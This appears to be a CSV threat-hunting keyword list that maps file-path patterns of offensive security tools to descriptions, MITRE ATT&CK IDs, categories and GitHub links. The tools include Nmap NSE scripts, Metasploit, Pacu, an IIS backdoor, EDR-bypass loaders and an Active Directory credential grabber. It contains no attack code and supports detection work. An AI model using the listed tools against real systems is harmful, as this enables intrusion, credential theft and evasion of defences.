-*/http-svn-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-svn-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-tenda-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z
-*/http-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-tplink-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-trace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-trane-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-unsafe-output-escaping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-useragent-tester.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-userdir-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vhosts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-virustotal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vlcstreamer-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vmware-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2006-3392.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2009-3960.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2010-0738.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2010-2861.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2011-3192.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2011-3368.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2012-1823.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2013-0156.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2013-6786.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2013-7091.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-2126.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-2127.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-2128.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-2129.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-3704.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2014-8877.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2015-1427.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2015-1635.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2017-1001000.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2017-5638.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2017-5689.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-cve2017-8917.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vulners-regex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/nmap-vulners,1,1,N/A,N/A,10,3002,526,2022-12-16T11:22:30Z,2017-12-19T21:21:28Z
-*/http-vuln-misfortune-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-vuln-wnr1000-creds.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-waf-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-waf-fingerprint.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-webdav-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-wordpress-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-wordpress-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-wordpress-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-xssed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/huan.exe *,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z
-*/HuanLoader/*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z
-*/HWSyscalls.cpp*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z
-*/hyperion.exe*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*/Hypnos.git*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z
-*/hypobrychium.git*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z
-*/iam__backdoor_users_password*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/iam__bruteforce_permissions/*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/iam__privesc_scan*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/iax2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/iax2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/icap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/icebreaker.git*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z
-*/icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z
-*/IDiagnosticProfileUAC*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z
-*/iec-identify.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/ielocalserver.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/ieshell32.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z
-*/IIS-Raid.git*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z
-*/ike-crack.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*/IKEForce*,offensive_tool_keyword,IKEForce,IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.,T1110 - T1201 - T1018,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs/ikeforce,1,0,N/A,N/A,3,226,73,2019-09-18T09:35:41Z,2014-09-12T01:11:00Z
